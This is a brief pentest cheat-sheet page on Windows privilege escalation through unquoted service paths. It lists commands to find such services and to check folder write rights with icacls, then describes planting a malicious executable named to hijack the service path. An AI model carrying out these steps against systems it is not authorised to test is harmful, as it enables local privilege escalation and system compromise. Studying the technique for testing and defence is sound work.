Skip to main content

Unquoted Service Paths

Finding services

checking running and stopped services

| There is a possiblity that the service is not running however if you have the right to start the service then we can leverage this for our privilege escalation.

Get-CimInstance -ClassName win32_service | Select Name,State,PathName

Unquoted service using cmd

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Unquoted service using powerup

.\PowerUp.ps1
Get-UnquotedService

Checking Access Rights on the folders

| once you identify a service you need to confirm in which folder do you have right to put your malicious file.

Checking rights on initial folder

icacls "C:\"

Checking rights on next folder to it from the path

icacls "C:\Programs\"
icacls "C:\Programs\Monitoring Game"
icacls "C:\Programs\Monitoring Game\system\game.exe"

What we are looking for is BUILTIN\Users:(OI)(CI)(RX,W) where the user has w write access.

Suppose we get access to write in icacls "C:\Programs\Monitoring Game" the file that we are going to create is system.exe.

Once you have found it, Put your malicious file with the name of the binary, Eg. You wanted to run game.exe put system.exe in the path and start the service.

Finding services
Checking Access Rights on the folders
- Checking rights on initial folder
- Checking rights on next folder to it from the path